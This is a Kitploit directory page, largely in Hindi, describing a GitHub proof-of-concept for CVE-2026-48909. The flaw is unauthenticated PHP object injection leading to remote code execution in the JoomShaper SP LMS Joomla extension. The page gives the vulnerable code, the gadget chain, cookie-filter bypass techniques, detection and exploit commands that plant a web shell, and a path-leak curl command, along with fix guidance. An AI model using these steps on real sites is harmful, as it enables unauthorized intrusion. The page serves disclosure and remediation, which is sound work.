Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-48909 — CVE-2026-48909 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: JoomShaper SP LMS में PHP ऑब्जेक्ट इंजेक्शन के माध्यम से अप्रमाणित रिमोट कोड निष्पादन। इसमें पहचान, शोषण और सुधार मार्गदर्शन शामिल है। | Kitploit
उपकरण/GitHubGitHub/is4yev/cve-2026-48909
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubis4yev/cve-2026-48909

CVE-2026-48909

CVE-2026-48909 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: JoomShaper SP LMS में PHP ऑब्जेक्ट इंजेक्शन के माध्यम से अप्रमाणित रिमोट कोड निष्पादन। इसमें पहचान, शोषण और सुधार मार्गदर्शन शामिल है।

रिपॉजिटरी देखें
23232 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-48909 — SP LMS PHP Object Injection → RCE

CVE CVSS CWE Affected Fixed

बिना प्रमाणीकरण के रिमोट कोड निष्पादन PHP Object Injection के माध्यम से JoomShaper SP LMS (com_splms) ≤ 4.1.3 for Joomla CMS में।

लेखक: Amin İsayev / Proxima Cyber Security


अवलोकन

SP LMS JoomShaper द्वारा एक लोकप्रिय Joomla Learning Management System एक्सटेंशन है जिसकी 100,000+ स्थापनाएँ हैं। संस्करण ≤ 4.1.3 lmsOrders कुकी को बिना किसी सत्यापन के सीधे में पास करते हैं, जिससे बिना प्रमाणीकृत हमलावर Joomla की मूल गैजेट श्रृंखला के माध्यम से एक दुर्भावनापूर्ण PHP ऑब्जेक्ट इंजेक्ट कर सकता है और रिमोट कोड निष्पादन प्राप्त कर सकता है।

unserialize()
फ़ील्डविवरण
CVE IDCVE-2026-48909
GHSAGHSA-gf8c-xmwj-whrh
प्रभावितSP LMS (com_splms) 1.0.0 – 4.1.3
समाधानSP LMS ≥ 4.1.4
Joomla आवश्यकता< 5.2.2 (गैजेट श्रृंखला 5.2.2 में पैच की गई)
CVSS 4.09.5 क्रिटिकल — AV:N/AC:L/AT:P/PR:N/UI:N
CWECWE-502: अविश्वसनीय डेटा का डिसीरियलाइज़ेशन
प्रमाणीकरण आवश्यककोई नहीं
प्रकटीकरण2026-05-26
प्रकाशित2026-06-20

भेद्यता

मूल कारण

components/com_splms/models/cart.php पंक्ति 28:

root@kitploit:~
$cookie  = Factory::getApplication()->input->cookie;
$raw     = $cookie->get('lmsOrders', base64_encode(serialize(array())));
$decoded = base64_decode($raw);
$cartItems = unserialize($decoded);   // ← अविश्वसनीय उपयोगकर्ता इनपुट

lmsOrders कुकी को base64-डिकोड किया जाता है और सीधे unserialize() में पास किया जाता है। एक हमलावर डिसीरियलाइज़ किए गए ऑब्जेक्ट को पूरी तरह से नियंत्रित करता है।

गैजेट श्रृंखला

Joomla का FormattedtextLogger वर्ग गैजेट प्रदान करता है:

root@kitploit:~
lmsOrders कुकी (हमलावर द्वारा नियंत्रित)
  └─► unserialize()                             [cart.php:28]
        └─► FormattedtextLogger.__destruct()    [Joomla गैजेट]
              └─► initFile() → File::write($path, $format)
                    └─► PHP कोड डिस्क पर लिखा गया → RCE

नोट: RCE के लिए Joomla < 5.2.2 आवश्यक है।
Joomla 5.2.2 ने FormattedtextLogger.__wakeup() को पैच किया (देखें PR #44428)।
PHP Object Injection अभी भी सभी Joomla संस्करणों पर com_splms ≤ 4.1.3 में मौजूद है।

फ़िल्टर बाईपास

Joomla का Input\Cookie::get() डिफ़ॉल्ट रूप से cmd फ़िल्टर लागू करता है, जो कुकी मान से +, /, और = को हटा देता है — ये वर्ण मानक base64 में मौजूद होते हैं। एक्सप्लॉइट उपयोग करता है:

  • hex2bin() एन्कोडिंग निषिद्ध PHP वर्णों ($, _, {, }, \n) से बचने के लिए
  • पैडिंग संरेखण यह सुनिश्चित करने के लिए कि base64 लंबाई 3 से विभाज्य है (कोई = पैडिंग नहीं)
  • पैडिंग वर्ण पुनरावृत्ति (62 वेरिएंट) base64 आउटपुट से / और + को समाप्त करने के लिए

प्रूफ़ ऑफ़ कॉन्सेप्ट

पहचान

root@kitploit:~
python3 CVE-2026-48909.py https://target.com
root@kitploit:~
[*] लक्ष्य : https://target.com
[*] पथ   : /index.php?option=com_splms&view=cart
[*] प्रोब  : lmsOrders=Tzo4OiJzdGRDbGFzcyI6MDp7fQ==

[कमज़ोर] प्रोब पर HTTP 500 बनाम सामान्य पर 200 — कुकी पर unserialize() कॉल किया गया
[!] तुरंत SP LMS >= 4.1.4 पर अपडेट करें।

एक्सप्लॉइट

root@kitploit:~
python3 CVE-2026-48909_exploit.py https://target.com /var/www/html/tmp/x.php

PoC स्क्रीनशॉट

शेल सक्रिय है https://target.com/tmp/x.php?c=id पर

सर्वर पथ ढूँढना (यदि अज्ञात है):

root@kitploit:~
# cPanel होस्टिंग — Joomla त्रुटि पृष्ठों से पथ लीक
curl -sk "https://target.com/administrator/" | grep -oP '\/home\d*\/[^"<\s]+'

# सामान्य पथ जांचने के लिए:
#   /var/www/html/tmp/x.php
#   /home/USER/public_html/tmp/x.php
#   /var/www/vhosts/DOMAIN/httpdocs/tmp/x.php

आवश्यकताएँ

root@kitploit:~
pip install requests

Python 3.10+


फिक्स / निवारण

  1. अपडेट करें SP LMS को तुरंत ≥ 4.1.4 संस्करण पर
  2. अपडेट करें Joomla को ≥ 5.2.2 पर गैजेट श्रृंखला हटाने के लिए
  3. अंतरिम उपाय के रूप में — डिसीरियलाइज़ेशन से पहले lmsOrders कुकी को मान्य और स्वच्छ करें:
root@kitploit:~
// उपयोगकर्ता-नियंत्रित डेटा पर unserialize() का उपयोग न करें
// इसके बजाय json_encode/json_decode का उपयोग करें
$cartItems = json_decode(base64_decode($raw), true) ?? [];

संदर्भ

  • CVE-2026-48909 — cve.org
  • CVE-2026-48909 — NVD
  • GHSA-gf8c-xmwj-whrh — GitHub Advisory
  • Joomla PR #44428 — FormattedtextLogger गैजेट पैच
  • CWE-502: अविश्वसनीय डेटा का डिसीरियलाइज़ेशन
  • OWASP: PHP Object Injection

अस्वीकरण

यह उपकरण शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए ही जारी किया गया है।
इस प्रोग्राम के दुरुपयोग या क्षति के लिए लेखक जिम्मेदार नहीं है।
उन सिस्टमों के विरुद्ध उपयोग न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट लिखित अनुमति नहीं है।


Amin İsayev / Proxima Cyber Security — 2026

टूल डाउनलोड करें